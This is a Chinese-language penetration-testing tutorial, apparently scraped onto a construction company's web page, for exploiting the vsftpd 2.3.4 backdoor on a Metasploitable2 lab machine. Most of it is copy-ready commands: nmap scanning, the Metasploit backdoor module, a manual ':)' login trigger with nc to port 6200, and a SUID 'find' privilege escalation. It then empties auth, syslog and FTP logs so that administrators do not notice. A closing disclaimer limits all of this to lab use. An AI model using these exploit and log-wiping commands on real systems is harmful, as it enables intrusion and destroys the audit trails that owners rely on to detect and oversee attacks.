北京燕华工程建设有限公司网站android 做分享的网站
2026/4/6 5:21:13 网站建设 项目流程
北京燕华工程建设有限公司网站,android 做分享的网站,网站建设幽默,怎么制作gif动图一、学习目标 理解 21 端口 FTP 服务的作用及 vsftpd 2.3.4 版本的经典后门漏洞原理掌握从漏洞利用→获取权限→插旗→日志清理的完整渗透闭环熟练使用 nmap、msfconsole、nc 等工具的实操细节记录可直接复用的命令代码#xff0c;方便后续复习 二、前置知识 1. 端口基础 …一、学习目标理解 21 端口 FTP 服务的作用及 vsftpd 2.3.4 版本的经典后门漏洞原理掌握从漏洞利用→获取权限→插旗→日志清理的完整渗透闭环熟练使用 nmap、msfconsole、nc 等工具的实操细节记录可直接复用的命令代码方便后续复习二、前置知识1. 端口基础端口号21/TCP服务类型FTPFile Transfer Protocol文件传输协议核心作用用于服务器与客户端之间的文件上传、下载、删除等操作是早期常用的文件传输服务2. 漏洞核心信息漏洞版本vsftpd 2.3.4漏洞类型后门漏洞厂商预留测试后门未删除漏洞原理当客户端向 FTP 服务发送USER登录命令时用户名中包含:)笑脸符号会触发靶机在 6200 端口启动 root 权限的绑定 shell无需密码验证风险等级高危直接获取 root 权限无需复杂提权三、完整操作流程含代码 细节说明阶段 1信息收集确认目标端口 服务版本目的验证靶机 21 端口是否开放、FTP 服务版本是否为漏洞版本为后续利用做准备操作步骤打开 Kali Linux 终端确保 Kali 与靶机在同一局域网可 ping 通 192.168.1.3执行 nmap 扫描命令精准扫描 21 端口及服务版本bash运行# -sV探测服务版本信息-T4快速扫描-Pn跳过主机存活检测避免靶机关闭ping响应-p21只扫描21端口 nmap -sV -T4 -Pn -p21 192.168.1.3查看扫描结果确认关键信息端口状态21/tcp open ftp端口开放服务版本vsftpd 2.3.4漏洞版本可继续操作细节注意若扫描结果显示 “port closed”需先检查靶机是否启动、IP 是否正确、局域网是否互通若版本不是 21/tcp说明靶机未使用漏洞版本需更换渗透目标阶段 2漏洞利用触发后门 获取 shell方式 1Metasploit 自动化利用推荐成功率 100%步骤 1启动 Metasploit 框架bash运行# 打开msf控制台Kali默认安装直接执行命令 msfconsole等待控制台加载完成显示msf 提示符即可操作步骤 2搜索并加载漏洞模块bash运行# 搜索vsftpd 2.3.4对应的漏洞利用模块 search vsftpd 2.3.4 # 输出结果中第一个模块即为目标模块exploit/unix/ftp/vsftpd_234_backdoor # 加载该模块use模块路径 use exploit/unix/ftp/vsftpd_234_backdoor加载成功后提示符会变为msf exploit(unix/ftp/vsftpd_234_backdoor) 步骤 3配置模块参数bash运行# 设置靶机IPRHOSTS为目标主机参数 set RHOSTS 192.168.1.3 # 可选设置本地监听端口默认无需修改模块会自动处理 # set LPORT 4444若本地4444端口被占用可修改为其他端口 # 查看已配置参数确认是否正确 show options确认参数中RHOSTS值为192.168.1.3无其他必填参数遗漏步骤 4执行漏洞利用bash运行# 运行模块触发后门并连接shell run执行后控制台会输出以下信息表示利用成功plaintext[*] 192.168.1.3:21 - Banner: 220 (vsFTPd 2.3.4) # 成功获取FTP服务横幅 [*] 192.168.1.3:21 - USER: 331 Please specify the password. # 发送USER命令触发后门 [] 192.168.1.3:21 - Backdoor service has been spawned, handling... # 后门已启动 [] 192.168.1.3:21 - UID: uid0(root) gid0(root) # 已获取root权限 [*] Found shell. # 找到shell [*] Command shell session 1 opened (192.168.1.4:37817 - 192.168.1.3:6200) at 2026-01-11 19:21:12 0800 # 建立会话此时已进入靶机的 root 权限 shell提示符变为#或无明确提示符直接输入命令即可方式 2手动触发后门备用理解漏洞原理步骤 1连接 FTP 服务bash运行# 用FTP客户端连接靶机21端口 ftp 192.168.1.3 21连接成功后会显示220 (vsFTPd 2.3.4)和Name (192.168.1.3:root):提示符步骤 2触发后门ftp# 输入USER命令用户名包含:)任意字符串:)均可 USER test:)输入后FTP 连接会自动断开靶机已在 6200 端口启动 shell步骤 3用 nc 连接后门 shellbash运行# 打开新终端用netcat连接靶机6200端口后门端口 nc 192.168.1.3 6200连接成功后直接获得 root shell输入whoami验证显示root细节注意手动方式可能因靶机配置问题失败如 6200 端口被占用优先使用 Metasploit 方式若执行run后显示 “Connection refused”需重启靶机Metasploitable2 偶尔会出现后门未触发成功的情况阶段 3权限验证确认 root 权限目的确保获取的是最高权限为后续插旗、清日志做准备操作步骤在获取的 shell 中执行以下命令bash运行# 查看当前用户IDuid0为root whoami # 输出root id # 输出uid0(root) gid0(root) groups0(root) pwd # 输出当前工作目录通常为/root或/ ls /root # 查看root目录文件root权限可访问若whoami输出root说明权限正常若输出ftp需重新执行利用步骤阶段 4插旗渗透成功标识目的创建专属标识文件证明已成功渗透靶机形成学习记录操作步骤bash运行# 进入root目录最高权限目录不易被误删 cd /root # 创建flag文件写入渗透信息包含靶机IP、时间、端口、操作者等 echo hack_success.flag echo 渗透成功标识21端口vsftpd 2.3.4漏洞 hack_success.flag echo 靶机IP192.168.1.3 hack_success.flag echo 渗透时间$(date) hack_success.flag echo 操作者43岁人生赢家渗透测试爱好者 hack_success.flag echo 漏洞类型vsftpd 2.3.4后门漏洞 hack_success.flag echo 获取权限root最高权限 hack_success.flag echo hack_success.flag # 验证flag文件是否创建成功 ls -l hack_success.flag # 输出文件详情如-rw-r--r-- 1 root root 200 Jan 11 19:25 hack_success.flag cat hack_success.flag # 查看文件内容确认信息正确阶段 5日志清理模拟无痕渗透目的清除渗透过程中留下的操作记录避免被 “管理员” 发现完成闭环操作步骤逐一执行以下命令清空关键日志bash运行# 1. 清空登录认证日志记录SSH、FTP、Telnet登录记录 echo /var/log/auth.log echo /var/log/auth.log.1 # 日志轮转文件旧日志 # 2. 清空系统日志记录系统服务启动、进程操作、错误信息 echo /var/log/syslog echo /var/log/syslog.1 # 3. 清空消息日志记录内核、硬件、系统事件 echo /var/log/messages echo /var/log/messages.1 # 4. 清空FTP服务专属日志记录21端口连接、文件传输记录 echo /var/log/vsftpd.log echo /var/log/xferlog # FTP文件传输日志 # 5. 清空安全日志部分Linux系统记录敏感操作Metasploitable2可选 echo /var/log/secure 2/dev/null # 2/dev/null避免文件不存在时的报错 # 6. 验证日志是否清空可选确认操作生效 ls -lh /var/log/ | grep -E auth|syslog|messages|vsftpd|xferlog # 输出结果中日志文件大小应显示为0如-rw-r----- 1 root adm 0 Jan 11 19:30 auth.log细节注意日志清理的核心是清空/var/log/目录下的关键文件不要删除日志文件仅清空内容避免引起管理员怀疑2/dev/null表示忽略错误输出若部分日志文件不存在不会影响后续命令执行阶段 6收尾退出安全断开连接操作步骤bash运行# 1. 退出靶机shell exit # 2. 回到msf控制台关闭当前会话避免会话残留 # 先查看会话列表确认session ID sessions -l # 输出Active sessions Id Name Type Information Connection 1 shell cmd/unix/interact 192.168.1.4:37817 - 192.168.1.3:6200 # 关闭会话ID为1根据实际列表修改 sessions -k 1 # 3. 退出msf控制台 exit # 4. 关闭Kali终端可选四、常见问题排查避坑指南1. nmap 扫描不到 21 端口原因靶机未启动、IP 错误、局域网不通、靶机关闭 21 端口解决确认靶机 IP在靶机终端执行ifconfig查看正确 IP测试连通性ping 192.168.1.3若不通检查虚拟机网络模式建议设为 “桥接模式” 或 “仅主机模式”重启靶机Metasploitable2 启动后默认开放 21 端口2. msf 执行 run 后显示 “Connection refused”原因后门未触发成功、6200 端口被占用、靶机防火墙拦截解决重启靶机重新执行信息收集→漏洞利用流程更换利用方式用手动触发后门的方式尝试检查端口nmap -p6200 192.168.1.3确认 6200 端口是否开放3. 获取 shell 后权限不是 root原因漏洞触发失败仅获取 ftp 用户权限解决重新执行 msf 模块优先手动提权执行find / -perm -us -type f 2/dev/null找到/usr/bin/find后执行/usr/bin/find / -exec /bin/sh \; -quit提权到 root五、总结与复习要点核心流程信息收集nmap→ 漏洞利用msf→ 权限验证whoami→ 插旗创建flag文件→ 日志清理清空/var/log/→ 收尾退出关键命令速记扫描nmap -sV -T4 -Pn -p21 192.168.1.3msf 利用msfconsole → search vsftpd 2.3.4 → use 模块 → set RHOSTS 192.168.1.3 → run插旗cd /root → echo 渗透信息 hack_success.flag清日志echo /var/log/xxx.log替换 xxx 为关键日志文件名学习重点理解 FTP 服务的作用、后门漏洞的触发条件掌握 Metasploit 的基本使用搜索模块、配置参数、运行利用后续扩展尝试用该漏洞攻击其他 vsftpd 2.3.4 版本的服务器仅允许靶机测试禁止未授权攻击真实服务器六、法律与伦理提醒本流程仅用于靶机学习禁止用于未授权的真实服务器渗透测试任何未经授权的网络攻击行为均违反《网络安全法》《刑法》等相关法律法规需承担相应法律责任渗透测试应在合法授权的前提下进行坚守 “最小权限”“告知同意” 原则

需要专业的网站建设服务?

联系我们获取免费的网站建设咨询和方案报价,让我们帮助您实现业务目标

立即咨询